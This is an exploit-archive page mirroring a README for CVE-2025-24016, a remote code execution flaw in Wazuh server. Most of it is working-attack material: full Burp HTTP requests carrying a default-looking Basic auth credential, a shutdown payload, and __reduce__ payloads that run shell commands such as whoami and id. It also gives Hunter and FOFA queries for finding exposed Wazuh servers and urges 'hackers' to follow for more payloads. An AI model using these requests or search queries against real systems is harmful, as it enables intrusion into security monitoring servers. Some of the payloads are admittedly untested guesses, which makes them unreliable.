Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-24016 PoC — Remote code execution in Wazuh server

Source
https://github.com/cybersecplayground/CVE-2025-24016-Wazuh-Remote-Code-Execution-RCE-PoC
Associated Vulnerability
Title:Remote code execution in Wazuh server (CVE-2025-24016)
Description:Wazuh is a free and open source platform used for threat prevention, detection, and response. Starting in version 4.4.0 and prior to version 4.9.1, an unsafe deserialization vulnerability allows for remote code execution on Wazuh servers. DistributedAPI parameters are a serialized as JSON and deserialized using `as_wazuh_object` (in `framework/wazuh/core/cluster/common.py`). If an attacker manages to inject an unsanitized dictionary in DAPI request/response, they can forge an unhandled exception (`__unhandled_exc__`) to evaluate arbitrary python code. The vulnerability can be triggered by anybody with API access (compromised dashboard or Wazuh servers in the cluster) or, in certain configurations, even by a compromised agent. Version 4.9.1 contains a fix.
Description
A critical RCE vulnerability has been identified in the Wazuh server due to unsafe deserialization in the wazuh-manager package. This bug affects Wazuh versions ≥ 4.4.0 and has been patched in version 4.9.1.
Readme
🚨 Wazuh Remote Code Execution (RCE) - PoC
### 📌 Vulnerability Summary
>A critical RCE vulnerability has been identified in the Wazuh server due to unsafe deserialization in the wazuh-manager package. This bug affects Wazuh versions ≥ 4.4.0 and has been patched in version 4.9.1.


🔍 **Details**
>The flaw lies in the Wazuh API's DistributedAPI, where user-controlled input is unsafely deserialized. This allows attackers with API access (e.g., compromised dashboard or cluster node) to execute arbitrary Python code on the master server using the run_as endpoint.


📬 **Proof of Concept (Burp Request)**
```
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg==  
Content-Type: application/json

{
  "__unhandled_exc__": {
    "__class__": "exit",
    "__args__": []
  }
}
```
📌 The Authorization header is the base64 of `wazuh-wui:MyS3cr37P450r.*-`.

📌 The payload causes the Wazuh server to shut down by calling Python's `exit()` method.

💥 **Impact**
- Full Remote Code Execution via the API
- Server Shutdown in PoC (DoS)
- Risk of lateral movement across Wazuh clusters

🛡️ Mitigation
- ✅ Upgrade to Wazuh v4.9.1 or higher
- 🚫 Avoid exposing the API externally
- 🧪 Monitor unusual API activity

### ✅ Example Payload to Run whoami
```
{
  "__unhandled_exc__": {
    "__class__": "os",
    "__import__": "os",
    "system": "whoami"
  }
}
```
But this alone won’t work unless the deserialization code actually executes the object tree. Instead, use a `__reduce__` based object that executes code.

Here’s the working format for a **Burp request** using Python’s `os.system()` via pickle-like logic:

💣 **Working Burp RCE Payload (Python Code Execution)**
```
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg==
Content-Type: application/json

{
  "__reduce__": [
    "__import__('os').system",
    ["whoami"]
  ]
}
```
🧬 **To run ls, change payload:**
```
{
  "__reduce__": [
    "__import__('os').system",
    ["ls -la"]
  ]
}
```


You can also use:

```
{
  "__reduce__": [
    "__import__('subprocess').getoutput",
    ["id"]
  ]
}
```
⚠️ Note: The actual deserialization must happen with `eval()` or similar mechanisms in the backend for this to work. Based on the Wazuh PoC, this is indeed possible if you control auth_context.

🔐 Pro Tip
Intercept the request in Burp, go to the Repeater tab, and test multiple payloads like:

- `"whoami"`
- `"id"`
- `"uname -a"`
- `"ls /home/wazuh"`

👇Query
- HUNTER : `product.name="Wazuh"`
- FOFA : `app="Wazuh"`

If the response is **empty** or status is **500**, check logs — **sometimes output isn’t returned.**
📚 Stay **sharp**, **hackers**! More **bug bounty PoCs**, **bypasses**, and **payloads** are coming!

Follow 👉 [@cybersecplayground](https://t.me/cybersecplayground) for daily hacking content!

> #bugbounty #rce #wazuh #infosec #security #pentest #zeroday #exploit
File Snapshot

 [4.0K]  /data/pocs/7a0130c576062f15fcfa81629f7392e49266ed4a
├── [1021]  CVE-2025-24016-POC.py
├── [1.1K]  LICENSE
└── [3.0K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →